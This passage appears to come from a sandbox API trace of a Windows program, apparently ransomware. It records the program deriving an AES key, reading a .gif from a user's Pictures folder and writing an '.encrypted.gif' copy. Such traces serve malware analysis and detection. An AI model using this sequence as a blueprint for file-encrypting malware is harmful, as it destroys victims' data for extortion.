lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.496] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.496] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.496] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.497] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.497] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.497] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.497] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.497] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.497] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.498] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.498] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.498] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.498] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.498] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.498] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.498] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.499] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.499] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.499] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0041.499] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.499] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.499] CryptDestroyHash (hHash=0x7c2100) returned 1 [0041.499] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rygemqdnb-rybeky y-c.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.500] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.500] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.502] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rygemqdnb-rybeky y-c.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.515] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.515] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.515] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.515] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.516] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.516] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xc15, lpOverlapped=0x0) returned 1 [0041.517] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc15) returned 0x7c9968 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc15) returned 0xac2018 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0041.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.518] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.518] 